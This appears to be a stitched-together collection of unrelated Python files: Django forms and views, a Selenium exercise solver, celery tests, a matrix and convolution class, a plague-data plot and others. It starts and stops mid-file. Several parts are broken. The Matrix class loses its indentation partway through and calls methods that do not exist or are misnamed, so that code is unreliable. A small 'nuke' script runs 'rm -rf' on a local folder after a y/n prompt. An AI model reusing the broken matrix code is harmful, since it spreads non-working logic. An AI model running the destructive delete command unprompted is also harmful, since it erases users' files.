except Exception as ex:
    # catches bad numeric input (ValueError from float()) among others
    print('Error -', ex)
bank = {'Jack': jack, 'Jill': jill}
pay_annual_interest(bank.values())
for cust, acc in bank.items():
    print(f"{cust}'s balance is {acc.balance()}")
|
# -*- coding: utf-8 -*-
"""
Messaging module
"""
# NOTE(review): deployment_settings, auth, msg and tasks are framework-injected
# globals (web2py/Eden model file) -- presumably provided by the including
# environment; confirm before running standalone.
if deployment_settings.has_module("msg"):
    # =============================================================================
    # Tasks to be callable async
    # =============================================================================
    def process_outbox(contact_method, user_id=None):
        """
        Process Outbox
        - will normally be done Asynchronously if there is a worker alive
        @param contact_method: one from s3msg.MSG_CONTACT_OPTS
        @param user_id: calling request's auth.user.id or None
        """
        if user_id:
            # Authenticate as the requesting user so permissions apply
            auth.s3_impersonate(user_id)
        # Run the Task
        result = msg.process_outbox(contact_method)
        return result
    # register for the async task scheduler
    tasks["process_outbox"] = process_outbox
# END =========================================================================
|
from selenium import webdriver
import math
def calc(x):
    """Return log(|12 * sin(x)|) as a string, for integer-valued input x."""
    angle = int(x)
    magnitude = abs(12 * math.sin(angle))
    return str(math.log(magnitude))
# Automated solution for the get_attribute training page.
browser = webdriver.Chrome()
link = "http://suninjuly.github.io/get_attribute.html"
browser.get(link)
# Read the hidden "valuex" attribute from the treasure element.
x_element = browser.find_element_by_id("treasure")
x = x_element.get_attribute("valuex")
y = calc(x)
# FIX: renamed from `input` so the builtin input() is no longer shadowed.
answer_field = browser.find_element_by_id("answer")
answer_field.send_keys(y)
checkbox1 = browser.find_element_by_id("robotCheckbox")
checkbox1.click()
radio1 = browser.find_element_by_id("robotsRule")
radio1.click()
# compound class name located via the dotted CSS-like form
button = browser.find_element_by_class_name("btn.btn-default")
button.click()
|
# coding=utf-8
from captcha.fields import CaptchaField
from django import forms
from django.contrib.auth.models import User
from registration.forms import RegistrationForm
from models import Object, Observation, ImagingDevice, FITSFile
class UploadFileForm(forms.Form):
    """ This form represents a basic request from Fine Uploader.
    The required fields will **always** be sent, the other fields are optional
    based on your setup.
    """
    # Always present in a Fine Uploader request:
    qqfile = forms.FileField()
    qquuid = forms.CharField()
    qqfilename = forms.CharField()
    # Optional fields (sent depending on uploader configuration, e.g. chunking):
    qqpartindex = forms.IntegerField(required=False)
    qqchunksize = forms.IntegerField(required=False)
    qqpartbyteoffset = forms.IntegerField(required=False)
    qqtotalfilesize = forms.IntegerField(required=False)
    qqtotalparts = forms.IntegerField(required=False)
class ObjectForm(forms.ModelForm):
    """
    A form for adding an object or modifying an existing one
    """
    class Meta:
        model = Object
        # `number` is the user-facing unique identifier; coordinates are J2000.
        fields = ('number', 'name', 'ra', 'dec', 'cal_offset')
        labels = {'number': 'Unique object number', 'ra': 'Right Ascension (J2000) (HH MM SS)', 'dec':
                  'Declination (J2000) ([±]Deg ArcMin ArcSec)', 'cal_offset': 'Calibration offset'}
class ObservationForm(forms.ModelForm):
    """
    A form for adding a new observation or modifying an existing one
    """
    class Meta:
        model = Observation
        # Only the relational fields are editable through this form.
        fields = ('target', 'device')
        labels = {'target': 'Target of observation', 'device': 'Device used'}
class MetadataForm(forms.Form):
    """
    A form to add missing information to the FITS header
    """
    # Display labels only; the stored values (JD/MJD/...) are unchanged.
    # FIX: corrected the misspelling "Seperate" -> "Separate" in the label text.
    DATE_FORMAT_CHOICES = (
        ('JD', 'Julian Date'),
        ('MJD', 'Modified Julian Date'),
        ('DATETIME', 'Date and Time (Same Field)'),
        ('DATETIMESEP', 'Date and Time (Separate Fields)')
    )
    date_format = forms.ChoiceField(choices=DATE_FORMAT_CHOICES)
    date = forms.CharField(max_length=255, label="Date of observation")
    # time is only meaningful for the split date/time formats, hence optional
    time = forms.CharField(max_length=255, label="Time of observation", required=False)
    exptime = forms.FloatField(label="Exposure time (s)")
    # NOTE: the field name shadows the builtin filter() inside this class body only
    filter = forms.CharField(max_length=255, label="Filter")
class MetadataKeyChoiceForm(forms.Form):
    """
    A form to pick which FITS header keys hold each piece of metadata.
    The empty ChoiceFields are presumably populated with header keys at
    runtime by the consuming view -- TODO confirm.
    """
    # FIX: corrected the misspelling "Seperate" -> "Separate" in the label text.
    DATE_FORMAT_CHOICES = (
        ('JD', 'Julian Date'),
        ('MJD', 'Modified Julian Date'),
        ('DATETIME', 'Date and Time (Same Field)'),
        ('DATETIMESEP', 'Date and Time (Separate Fields)')
    )
    date_format = forms.ChoiceField(choices=DATE_FORMAT_CHOICES)
    date = forms.ChoiceField()
    time = forms.ChoiceField()
    filter = forms.ChoiceField()
    exposure_time = forms.ChoiceField()
class ImagingDeviceForm(forms.ModelForm):
    """
    Form to add a new imaging device or to modify an existing one
    """
    class Meta:
        model = ImagingDevice
        fields = ('name', 'scale', 'mirror_diameter', 'description')
        labels = {'name': 'Name of your device', 'scale': 'Pixel scale (arcseconds)',
                  'mirror_diameter': 'Main Mirror / Objective Lens diameter (m)'}
        # Multi-line free text input for the description field.
        widgets = {'description': forms.Textarea}
class RedoCalibrationForm(forms.Form):
    """
    Form for users to re-do the calibration with their own max and min values
    """
    # Both bounds default to 0; presumably 0/0 means "use automatic bounds" --
    # TODO confirm against the calibration view.
    max_use = forms.FloatField(initial=0)
    min_use = forms.FloatField(initial=0)
class CAPTCHARegistrationForm(RegistrationForm):
    """
    Custom registration form including a CAPTCHA
    """
    # Extends django-registration's stock form with a bot check.
    captcha = CaptchaField()
class ChooseUserForm(forms.Form):
    """
    Form to choose a user from a dropdown list
    """
    # Ordered by username so the dropdown is alphabetical.
    user = forms.ModelChoiceField(queryset=User.objects.all().order_by('username'))
class ChooseStatusForm(forms.Form):
    """
    Form to choose a status from a dropdown list
    """
    # Choices come straight from the FITSFile model so the two stay in sync.
    status = forms.ChoiceField(choices=FITSFile.STATUS_CHOICES)
class RADecForm(forms.Form):
    """
    Form to enter an Right Ascension and Declination
    """
    # Free-text inputs; presumably parsed/validated downstream -- no format
    # constraint is enforced here.
    ra = forms.CharField(label="RA")
    dec = forms.CharField(label="Dec")
class LightcurveSearchForm(forms.Form):
    """
    Form to enter data for a lightcurve search
    """
    user_input = forms.CharField(label="Input")
    # Search either by object name or by sky coordinates.
    input_type = forms.ChoiceField(label="Type of input", choices=(
        ('NAME', 'Name'),
        ('COORD', 'Co-ordinates'),
    ), initial='COORD', widget=forms.RadioSelect)
    # units/coordinate_frame/radius are required=False -- presumably they only
    # apply to coordinate searches; confirm in the consuming view.
    units = forms.ChoiceField(label="Units", choices=(
        ('DD', 'Degrees Degrees'),
        ('HD', 'Hours Degrees')
    ), required=False, widget=forms.RadioSelect)
    coordinate_frame = forms.ChoiceField(label="Co-ordinate frame", choices=(
        ('fk5', 'FK5'),
        ('icrs', 'ICRS'),
        ('fk4', 'FK4'),
        ('galactic', 'Galactic')
    ), required=False, initial='fk5')
    radius = forms.CharField(label="Radius (arcsec)", required=False, initial=10)
|
from django.shortcuts import render,get_object_or_404,redirect
from .models import Blog
from django.utils import timezone
from .forms import BlogForm
from django.core.paginator import Paginator
# Create your views here.
def home(request):
    """Blog index: optional writer search plus 3-per-page pagination."""
    queryset = Blog.objects.all()
    if request.GET.get('search') == 'true':
        # narrow the listing to a single author when search mode is on
        queryset = Blog.objects.filter(writer=request.GET.get('writer'))
    page_number = request.GET.get('page')
    page_obj = Paginator(queryset, 3).get_page(page_number)
    return render(request, 'home.html', {'blogs': page_obj})
def detail(request, id):
    """Render a single blog post, returning 404 when the pk is unknown."""
    return render(request, 'detail.html', {'blog': get_object_or_404(Blog, pk=id)})
def new(request):
    """Show an empty BlogForm for composing a new post."""
    blank_form = BlogForm()
    return render(request, 'new.html', {'form': blank_form})
def create(request):
    """Persist a submitted BlogForm; silently fall back to home on invalid input."""
    form = BlogForm(request.POST, request.FILES)
    if not form.is_valid():
        return redirect('home')
    blog = form.save(commit=False)
    # stamp the publication time server-side rather than trusting the client
    blog.pub_date = timezone.now()
    blog.save()
    return redirect('detail', blog.id)
def edit(request, id):
    """Show the edit form for one post.

    FIX: uses get_object_or_404 (already imported and used by detail())
    instead of Blog.objects.get, so an unknown pk yields a 404 rather
    than an unhandled DoesNotExist (HTTP 500).
    """
    edit_blog = get_object_or_404(Blog, pk=id)
    return render(request, 'edit.html', {'blog': edit_blog})
def update(request, id):
    """Apply POSTed title/writer/body to an existing post and re-stamp pub_date.

    FIX: uses get_object_or_404 instead of Blog.objects.get, so an unknown
    pk yields a 404 rather than an unhandled DoesNotExist (HTTP 500).
    """
    update_blog = get_object_or_404(Blog, pk=id)
    update_blog.title = request.POST['title']
    update_blog.writer = request.POST['writer']
    update_blog.body = request.POST['body']
    update_blog.pub_date = timezone.now()
    update_blog.save()
    return redirect('detail', update_blog.id)
def delete(request, id):
    """Delete one post and return to the index.

    FIX: uses get_object_or_404 instead of Blog.objects.get, so an unknown
    pk yields a 404 rather than an unhandled DoesNotExist (HTTP 500).
    """
    delete_blog = get_object_or_404(Blog, pk=id)
    delete_blog.delete()
    return redirect('home')
|
"""Test cases for the module that uses a cookbook programming style"""
# TODO: Add correct import statements
# TODO: Add test cases to adequately cover the program
# TODO: Run test coverage monitoring and reporting with pytest-cov
def test_read_file_populates_data_0():
    """Checks that reading the file populates global data variable"""
    # pylint: disable=len-as-condition
    # FIX: the module under test was never imported anywhere in this file
    # (see the TODOs above), so every reference below raised NameError.
    # A function-local import keeps this test self-contained.
    import compute_tf_cookbook
    assert len(compute_tf_cookbook.data) == 0
    compute_tf_cookbook.read_file("inputs/input.txt")
    assert len(compute_tf_cookbook.data) != 0
|
#!/bin/python3
import math
import os
import random
import re
import sys
#
# Complete the 'getTotalX' function below.
#
# The function is expected to return an INTEGER.
# The function accepts following parameters:
# 1. INTEGER_ARRAY a
# 2. INTEGER_ARRAY b
#
def getTotalX(a, b):
    """Count the integers 'between' two sets (HackerRank problem).

    An integer x qualifies when every element of a divides x AND x divides
    every element of b.  Any such x satisfies x <= min(b), which bounds the
    search.  Replaces the original two-pass build-then-intersect approach
    (which also computed an unused max(b)) with one equivalent direct scan.

    Args:
        a: list of positive ints (x must be a common multiple of these).
        b: list of positive ints (x must be a common divisor of these).
    Returns:
        int: how many x in [1, min(b)] satisfy both conditions.
    """
    count = 0
    for x in range(1, min(b) + 1):
        if all(x % elem == 0 for elem in a) and all(elem % x == 0 for elem in b):
            count += 1
    return count
if __name__ == '__main__':
    # HackerRank harness: the answer is written to the path in OUTPUT_PATH.
    fptr = open(os.environ['OUTPUT_PATH'], 'w')
    first_multiple_input = input().rstrip().split()
    # n and m are the advertised array lengths; they are read but not needed.
    n = int(first_multiple_input[0])
    m = int(first_multiple_input[1])
    arr = list(map(int, input().rstrip().split()))
    brr = list(map(int, input().rstrip().split()))
    total = getTotalX(arr, brr)
    fptr.write(str(total) + '\n')
    fptr.close()
|
from django.db import models
# Create your models here.
class pfc(models.Model):
    # Single-field settings record holding a year value -- exact intent is
    # not visible from here; TODO confirm with the app owner.
    # NOTE(review): class/field names break Python conventions (PascalCase /
    # snake_case), but renaming would require a migration, so left as-is.
    Year_to_be_forward = models.IntegerField(default=2017)
    # For_the_year = models.IntegerField()
|
import argparse
# Command-line options for the MolGAN trainer.
args = argparse.ArgumentParser(description='MolGAN model for molecular.')
# FIX: type= is now supplied for every numeric option.  Without it, argparse
# returns command-line values as *strings*, so overriding any numeric default
# (e.g. --batch_dim 64) silently changed the option's type and broke arithmetic.
args.add_argument('--device', default=1, type=int)
args.add_argument("--mode", default="train", help='mode for model, default is true')
args.add_argument('--learning_rate', default=1e-3, type=float, help='learning rate')
args.add_argument('--batch_dim', default=128, type=int, help='size of a batch')
args.add_argument('--la', default=1.0, type=float)
args.add_argument('--dropout_rate', default=0., type=float)
args.add_argument('--z_dim', default=8, type=int, help='the sample dim')
args.add_argument('--epochs', default=10, type=int)
args.add_argument('--temperature', default=1.0, type=float)
args.add_argument('--n_critic', default=5, type=int, help='the ratio of train discriminator and generator' )
# parser = argparse.ArgumentParser(description='Process some integers.')
args.add_argument('--dataset', default='../data/', help='the data path')
# args.add_argument('--model', default='wavelet_gcn', help='model name')
args.add_argument('--max_atom_num', default=29, type=int)
args = args.parse_args()
print(args)
# batch_dim = 128
# la = 1
# dropout = 0
# n_critic = 5
# metric = 'validity,sas'
# n_samples = 5000
# z_dim = 8
# epochs = 10
# save_every = 1 # May lead to errors if left as None
|
from django.test import TestCase
import models as md
# class ApiViewTest(TestCase):
# def test_validate_user(self):
# response = self.
|
import socket
import unittest2 as unittest
from celery.task.builtins import PingTask
from celery.utils import gen_unique_id
from celery.worker import control
from celery.worker.revoke import revoked
from celery.registry import tasks
hostname = socket.gethostname()
class TestControlPanel(unittest.TestCase):
    """Exercises the worker's ControlDispatch command panel.

    NOTE(review): written against a legacy celery layout
    (celery.worker.control / celery.registry) and unittest2.
    """
    def setUp(self):
        # dispatcher scoped to this host, so broadcast targeting can be tested
        self.panel = control.ControlDispatch(hostname=hostname)
    def test_shutdown(self):
        # the shutdown command terminates the worker via SystemExit
        self.assertRaises(SystemExit, self.panel.execute, "shutdown")
    def test_dump_tasks(self):
        # smoke test: must not raise
        self.panel.execute("dump_tasks")
    def test_rate_limit(self):
        task = tasks[PingTask.name]
        old_rate_limit = task.rate_limit
        try:
            # set a string rate limit, then reset it with the integer 0
            self.panel.execute("rate_limit", kwargs=dict(
                task_name=task.name,
                rate_limit="100/m"))
            self.assertEqual(task.rate_limit, "100/m")
            self.panel.execute("rate_limit", kwargs=dict(
                task_name=task.name,
                rate_limit=0))
            self.assertEqual(task.rate_limit, 0)
        finally:
            # restore the registry's shared task state for other tests
            task.rate_limit = old_rate_limit
    def test_rate_limit_nonexistant_task(self):
        # unknown task names must be ignored, not raise
        self.panel.execute("rate_limit", kwargs={
            "task_name": "xxxx.does.not.exist",
            "rate_limit": "1000/s"})
    def test_unexposed_command(self):
        # commands not exposed on the panel are silently ignored
        self.panel.execute("foo", kwargs={})
    def test_revoke(self):
        uuid = gen_unique_id()
        # a revoke addressed to this host is applied ...
        m = {"command": "revoke",
             "destination": hostname,
             "task_id": uuid}
        self.panel.dispatch_from_message(m)
        self.assertIn(uuid, revoked)
        # ... while one addressed elsewhere is not
        m = {"command": "revoke",
             "destination": "does.not.exist",
             "task_id": uuid + "xxx"}
        self.panel.dispatch_from_message(m)
        self.assertNotIn(uuid + "xxx", revoked)
|
import json
import re
class Matrix:
def __init__(self):
self.matrix = []
self.input_list = []
def rows(self):
return len(self.matrix)
def colums(self):
if self.row() == 0:
return 0
return len(self.matrix[0])
    # ------------------- read matrix from stdin ---------------------------
    def create_matrix_from_stdin(self, rows, cols):
        """Prompt for rows*cols numeric values and append the resulting 2-D
        rows to self.matrix; exits the process on empty or non-numeric input.

        Returns the accumulated self.matrix, so repeated calls build up
        layers (see create_3d_matrix_from_stdin).
        """
        row_list = []
        item = 0
        for i in range(rows):
            for j in range(cols):
                item = input(f"input item[{i}][{j}]: ")
                if item:
                    try:
                        item = float(item)
                        row_list.append(item)
                    except ValueError:
                        print('All values must be numeric ')
                        exit()
                else:
                    print("input is empty")
                    exit()
            # one full row collected; start accumulating the next one
            self.matrix.append(row_list)
            row_list = []
        return self.matrix
    def create_3d_matrix_from_stdin(self):
        """Prompt for layer/row/column counts, then read that many 2-D
        layers from stdin; replaces self.matrix with the 3-D result."""
        rows = input("input number of rows: ")
        cols = input("input number of colums: ")
        layer = input('input number of layers: ')
        matrix_3d = []
        if rows and cols and layer:
            try:
                rows = int(rows)
                cols = int(cols)
                layer = int(layer)
            except ValueError:
                print('Number of rows and number of columns mast be numeric')
                exit()
        else:
            print('There is empty imput')
            exit()
        for n in range(layer):
            print(f'layer {n+1}')
            matrix_3d.append(self.create_matrix_from_stdin(rows, cols))
            # create_matrix_from_stdin accumulates into self.matrix, so it is
            # reset between layers to keep each layer independent
            self.matrix = []
        self.matrix = matrix_3d
        return self.matrix
    # ----------------- read from file -----------------------------------
    def read_from_file(self, file_name):
        """Dispatch to read_txt/read_json based on the file extension;
        exits with a usage message for any other extension."""
        file_extension = file_name.split('.')[-1]
        if file_extension == 'txt':
            return self.read_txt(file_name)
        elif file_extension == 'json':
            return self.read_json(file_name)
        else:
            print('Enter the name of the json or txt file with its extension.'
                  ' Ex. filename.txt, filename.json')
            exit()
# ----------------file content format check ----------------
def check_file_content(self, file_name):
matrix = []
with open(file_name) as f:
text = f.readlines()
for i in text:
i = i.strip('\n')
try:
i = re.findall(r'-?\d+', i)
matrix.append(float(i[0]))
except IndexError:
print('All values must be numeric')
exit()
if len(matrix[3::]) != matrix[0] * matrix[1] * matrix[2]:
print('wrong number of items')
exit()
return matrix
    # ------------ read from txt -------------------------
    def read_txt(self, file_name):
        """Build a 3-D matrix (layers x rows x cols) from a validated text
        file and return it.

        NOTE(review): returns None if the counters never line up exactly;
        check_file_content's validation should make that unreachable, but
        confirm before relying on the return value.
        """
        text = self.check_file_content(file_name)
        layer = int(text[0])
        row = int(text[1])
        col = int(text[2])
        row_list = []
        col_list = []
        # walk the flat value list, folding it into cols, then rows, then layers
        for i in range(len(text[3::])):
            col_list.append(text[i+ 3])
            if len(col_list) == col:
                row_list.append(col_list)
                col_list = []
            if len(row_list) == row:
                self.matrix.append(row_list)
                row_list = []
                layer -= 1
                if layer == 0:
                    return self.matrix
# ------------- read from json ------------------------
def read_json(self, file_name):
try:
with open(file_name, 'r+') as f:
self.matrix = json.load(f)
except FileNotFoundError:
print('File not found. Enter the full path or check spelling.')
exit()
return self.matrix
    # ---------------------- write to file --------------------------
    def write_to_file(self, file_name, text):
        """Dispatch to write_text/write_json based on the file extension.

        NOTE(review): self.final_text is assigned but never used anywhere
        visible, and unknown extensions silently return None instead of
        reporting an error -- both look like candidates for cleanup.
        """
        self.final_text = ''
        file_extension = file_name.split('.')[-1]
        if file_extension == 'txt':
            return self.write_text(file_name, text)
        elif file_extension == 'json':
            return self.write_json(file_name, text)
# -------- write to text file ----------------
def write_text(self, file_name, matrix):
layer = len(matrix)
row = len(matrix[0])
col = len(matrix[0][0])
with open(file_name, 'w+') as f:
f.write(f'{layer}\n{row}\n{col}\n')
for i in matrix:
for j in i:
for item in j:
f.write(f'{item}\n')
# --------- write to json ------------------------
def write_json(self, file_name, text):
with open(file_name, 'w+') as f:
json.dump(text, f)
# --------- cheking matrices size for addition or subtruction ---------
def checking(self, matrix_a, matrix_b):
# checking the correspondence of the size of 2 matrices
if len(matrix_a) != len(matrix_b):
print("The two matrices must be the same size, i.e.\n"
"count of rows must match in size.")
exit()
col = len(matrix_a)
for i in range(col):
if len(matrix_a[i]) != len(matrix_b[i]):
print("The two matrices must be the same size, i.e.\n"
"count of columns mast match in size.")
exit()
# ---------------- addition of matrices ------------------------
def addition_3d(self, matrix3d_a, matrix3d_b):
layer_matrix = []
if len(matrix3d_a) == len(matrix3d_b):
layer = len(matrix3d_a)
else:
print('Sizes of two matrices must be the same')
for l in range(layer):
layer_matrix.append(self.addition_2d(matrix3d_a[l],matrix3d_b[l]))
self.matrix = layer_matrix
return self.matrix
def addition_2d(self, matrix_a, matrix_b):
self.matrix = []
# check correspondence of matrices
self.checking(matrix_a, matrix_b)
# addition of two matrices
for i in range(len(matrix_a)):
new_row = []
for j in range(len(matrix_a[i])):
summary = matrix_a[i][j] + matrix_b[i][j]
new_row.append(summary)
self.matrix.append(new_row)
self.rows = len(self.matrix)
self.columns = len(self.matrix[0])
return self.matrix
# ---------------- subtraction of matrices ------------------------
def subtraction_3d(self, matrix3d_a, matrix3d_b):
layer_matrix = []
if len(matrix3d_a) == len(matrix3d_b):
layer = len(matrix3d_a)
else:
print('Sizes of two matrices must be the same')
for l in range(layer):
layer_matrix.append(self.__subtraction_2d(matrix3d_a[l],
matrix3d_b[l]))
self.matrix = layer_matrix
return self.matrix
def __subtraction_2d(self, matrix_a, matrix_b):
self.checking(matrix_a, matrix_b)
self.matrix = []
# subtraction of two 2D matrices:
for i in range(len(matrix_a)):
new_row = []
for j in range(len(matrix_a[i])):
difference = matrix_a[i][j] - matrix_b[i][j]
new_row.append(difference)
self.matrix.append(new_row)
return self.matrix
# ---------------- multiplication of matrices ------------------------
def multiply_3d(self, matrix3d_a, matrix3d_b):
layer_matrix = []
if len(matrix3d_a) != len(matrix3d_b):
print('Number of layers of two matrices must be the same')
exit()
layer = len(matrix3d_a)
for l in range(layer):
self.matrix.append(self.__multiply_2d(matrix3d_a[l],
matrix3d_b[l]))
return self.matrix
def __multiply_2d(self, matrix_a, matrix_b):
matrix_2d = []
# checking compatibility of two matrices
if len(matrix_a[0]) != len(matrix_b):
print("The number of columns of the 1st matrix must be\n"
"equal the number of rows of the 2nd matrix.")
exit()
# Multiplication
for i in matrix_a:
new_row = []
for n in range(len(matrix_b[0])):
idx = 0
res = 0
for j in i:
res = res + j * matrix_b[idx][n]
idx += 1
new_row.append(round(res, 1))
matrix_2d.append(new_row)
return matrix_2d
# ---------------- scalar multiplication of matrices -----------------
def scalar_multiplication_3d(self, constant, matrix):
self.matrix = []
for layer in matrix:
new_layer = []
for row in layer:
new_row = []
for i in row:
new_row.append(round(i * constant, 2))
new_layer.append(new_row)
self.matrix.append(new_layer)
return self.matrix
# ---------------- inversion of matrices 2x2 ------------------------
def inverse2x2(self, matrix):
try:
coefficient = 1 / (matrix[0][0] * matrix[1][1] -
matrix[0][1] * matrix[1][0])
except ZeroDivisionError:
print('division by zero')
exit()
new_matrix = [[matrix[1][1], -matrix[0][1]],
[-matrix[1][0], matrix[0][0]]]
self.matrix = []
for i in new_matrix:
new_row = []
for n in i:
new_row.append(round(n * coefficient, 2))
self.matrix.append(new_row)
return self.matrix
# ---------------- division of matrices 2x2 ------------------------
def division2x2(self, matrix_a, matrix_b):
matrix_b = self.inverse2x2(matrix_b)
self.matrix = []
# Multiply A * 1/B
self.matrix = self.multiply_2d(matrix_a, matrix_b)
return self.matrix
class Convolution:
    """Valid (no-padding) convolution of 3D matrices, layer by layer."""

    def __init__(self):
        self.input_matrix = []     # current window of input layers
        self.filter_matrices = []  # one 2D filter per input layer
        self.final_matrix = []     # accumulated 2D outputs of convolution_3d

    def convolution2d(self):
        """Convolve every input layer with its same-index filter layer.

        Returns one 2D result per layer, each of valid size
        (rows - filter_rows + 1) x (cols - filter_cols + 1).
        Exits with a message when a value is not numeric.
        """
        final_result = []
        # loop through layers
        for layer, input_list in enumerate(self.input_matrix):
            resulting_list = []
            number_row = len(input_list)
            number_column = len(input_list[0])
            filter_matrix = self.filter_matrices[layer]
            filter_row = len(filter_matrix)
            filter_col = len(filter_matrix[0])
            # final size of the output matrix
            end_r = number_row - filter_row + 1
            end_c = number_column - filter_col + 1
            # calculate the convolution for this 1xRxC layer
            for r in range(end_r):
                res_list = []
                for c in range(end_c):
                    res = 0
                    for n, i in enumerate(filter_matrix):
                        try:
                            for v, j in enumerate(i):
                                res = res + j * input_list[n + r][c + v]
                        except TypeError:
                            print('Values must be numeric!')
                            exit()
                    res_list.append(res)
                resulting_list.append(res_list)
            final_result.append(resulting_list)
        return final_result

    def __convolution_3d(self, final_result=None):
        """Reduce the per-layer 2D results to a single 2D matrix by summing.

        Recursively folds the first two layer results together until one
        remains. Computes the layer results itself when none are passed.
        """
        # was final_result=[] — a mutable default argument shared across calls
        if not final_result:
            final_result = self.convolution2d()
        if len(final_result) == 1:
            return final_result
        # Matrix is only needed when there is something to fold
        matrix = Matrix()
        final_result[0] = matrix.addition_2d(final_result[0], final_result[1])
        final_result.remove(final_result[1])
        # was an opaque 'for size in range(len(final_result)): return ...'
        return self.__convolution_3d(final_result)

    def convolution_3d(self, input_matrix=None, filter_matrix=None,
                       bias_value=0):
        """3D convolution: slide the filter stack along the depth axis.

        Each depth offset yields one 2D output (sum over the filter's layers)
        with bias_value added to every entry. Exits when the filter is deeper
        than the input.
        """
        # was 'input_matrix: list = []' etc. — mutable default arguments
        input_matrix = [] if input_matrix is None else input_matrix
        filter_matrix = [] if filter_matrix is None else filter_matrix
        self.filter_matrices = filter_matrix
        base_len = len(input_matrix)
        filter_len = len(filter_matrix)
        deff = base_len - filter_len + 1
        if deff < 1:
            print('Filter matrix is larger than base matrix')
            exit()
        for i in range(deff):
            self.input_matrix = input_matrix[i:i + filter_len]
            matrices = self.__convolution_3d()
            for j in matrices[0]:
                for n, v in enumerate(j):
                    j[n] = v + bias_value
            self.final_matrix.append(matrices[0])
        return self.final_matrix
# Library module: nothing to run when executed directly.
if __name__ == "__main__":
    pass
|
import numpy as np
import matplotlib.pyplot as plt

# Kermack-McKendrick closed-form fit plotted against the reported weekly
# death counts of the 1905-06 Bombay plague epidemic.
Nt = 100
T = 30
t = np.linspace(0, T, Nt + 1)
R_list = np.zeros(Nt + 1)
t_2 = np.linspace(0, T, T + 1)
# Weekly deaths reported during the epidemic (one value per week)
BP_data = [2,3,5,10,20,30,40,50,80,100,200,300,400,500,600,700,800,900,800,700,600,500,400,300,200,100,80,50,40,30,20]
for i in range(Nt):
    t_ = 0.2*t[i+1]-3.4
    # dR/dt of the Kermack-McKendrick model: a * sech^2(b*t - phi) form
    R_list[i+1] = 890*(2*np.cosh(t_)/(np.cosh(2*t_)+1))**2
plt.plot(t, R_list)
plt.plot(t[::10], R_list[::10], 'bo', label='Kermack and McKendrick')
print(len(t_2))      # was Python-2 'print len(...)': SyntaxError on Python 3
print(len(BP_data))
plt.plot(t_2, BP_data, 'ro', label='Correct data from BP')
plt.xlabel("Weeks")
plt.ylabel("Deaths")
plt.title("Bombay Plague Epidemic")
plt.legend()
plt.savefig("plots/Bombay_plague.png")
plt.show()
|
#!/usr/bin/env python3
import os
def nuke():
    """Re-create the 'complex' directory from its zip archive (destructive).

    Asks for confirmation first; anything other than 'y' aborts.
    """
    answer = input("do you really wish to nuke this file? (y/n) ")
    if answer != 'y':
        print("Launch aborted")
        return
    # NOTE(review): backs up to complex_sav.zip but restores from complex.zip —
    # confirm the two archive names are intentional.
    for command in ('zip complex_sav.zip complex',
                    'rm -rf complex',
                    'unzip complex.zip',
                    'zip -r complex.zip complex'):
        os.system(command)
    print("-----------------------------")
    print("-----------------------------")
    print("----Bomb has been dropped----")
    print("-----------------------------")
    print("-----------------------------")

nuke()
|
import setuptools
# Use the repository README as the PyPI long description.
with open("README.md", "r") as filep:
    long_description = filep.read()
# Package metadata for the Recombination_analysis distribution.
setuptools.setup(
    name='Recombination_analysis',
    version='0.1.4',
    description='Analyze recombination events using kmers',
    url='https://github.com/zhuweix/recombination_analysis',
    author='Zhuwei Xu',
    author_email='zhuweix8@gmail.com',
    license='MIT',
    long_description=long_description,
    long_description_content_type="text/markdown",
    packages=setuptools.find_packages(),
    install_requires=[
        'matplotlib',
        'bitarray',
        'numpy'],
    zip_safe=False,
    python_requires='>=3.6')
"""
*******
Errors
*******
Custom exceptions for ingest
"""
class InvalidIngestStageParameters(Exception):
    """
    Exception raised if parameters passed to IngestStage.run fail validation
    """
    # TODO
    # Pretty stack traces using Python's traceback module
    pass
|
import re
def myAtoi(str):
    """Convert a string to a 32-bit signed integer (LeetCode 8 semantics).

    Leading whitespace is skipped, an optional single '+'/'-' sign is read,
    then the longest run of leading digits is converted; anything after the
    digits is ignored. The result is clamped to [-2**31, 2**31 - 1].
    Returns 0 when no digits can be read.

    NOTE: the parameter name shadows the builtin ``str``; kept for
    backward compatibility with existing keyword callers.
    """
    INT_MIN, INT_MAX = -2147483648, 2147483647
    # raw strings for the regexes (the originals triggered invalid-escape
    # warnings); '^\s*' strips leading whitespace only
    s = re.sub(r"^\s*", "", str)
    if not s:
        return 0
    multiplier = 1
    if s[0] in "+-":
        multiplier = -1 if s[0] == "-" else 1
        s = s[1:]
    digits = re.match(r"^[0-9]*", s).group()
    if not digits:
        return 0
    atoi = multiplier * int(digits)
    # clamp to the 32-bit signed range
    if atoi > INT_MAX:
        return INT_MAX
    if atoi < INT_MIN:
        return INT_MIN
    return atoi

print(myAtoi("-2147483648"))
import json
import cv2
import numpy as np
from os.path import join as pjoin
import os
import time
import shutil
from detect_merge.Element import Element
def show_elements(org_img, eles, show=False, win_name='element', wait_key=0, shown_resize=None, line=2):
    """Draw every element's bounding box on a copy of the image.

    Optionally resizes the annotated copy and displays it in an OpenCV
    window. Returns the (possibly resized) annotated image.
    """
    palette = {'Text': (0, 0, 255), 'Compo': (0, 255, 0), 'Block': (0, 255, 0), 'Text Content': (255, 0, 255)}
    canvas = org_img.copy()
    for ele in eles:
        ele.visualize_element(canvas, palette[ele.category], line)
    shown = canvas if shown_resize is None else cv2.resize(canvas, shown_resize)
    if show:
        cv2.imshow(win_name, shown)
        cv2.waitKey(wait_key)
        if wait_key == 0:
            cv2.destroyWindow(win_name)
    return shown
def save_elements(output_file, elements, img_shape):
    """Serialize elements (plus the image shape) to a JSON file.

    Returns the dict that was written.
    """
    components = {'compos': [ele.wrap_info() for ele in elements],
                  'img_shape': img_shape}
    # was json.dump(..., open(output_file, 'w'), ...): the handle was never
    # closed — use a context manager so the file is flushed and released
    with open(output_file, 'w') as f:
        json.dump(components, f, indent=4)
    return components
def reassign_ids(elements):
    """Renumber element ids sequentially from 0 in list order."""
    next_id = 0
    for element in elements:
        element.id = next_id
        next_id += 1
def refine_texts(texts, img_shape):
    """Drop probable OCR noise.

    Keeps texts longer than one character whose height is under 7.5% of the
    image height.
    """
    return [t for t in texts
            if len(t.text_content) > 1 and t.height / img_shape[0] < 0.075]
def merge_text_line_to_paragraph(elements, max_line_gap=5):
    """Merge vertically adjacent text lines into paragraph elements.

    Two texts are merged when their boxes, stretched vertically by
    max_line_gap pixels, intersect. The pairwise pass repeats until a full
    pass makes no change. Non-text elements pass through untouched.
    """
    texts = []
    non_texts = []
    for ele in elements:
        if ele.category == 'Text':
            texts.append(ele)
        else:
            non_texts.append(ele)
    changed = True
    while changed:
        changed = False
        temp_set = []
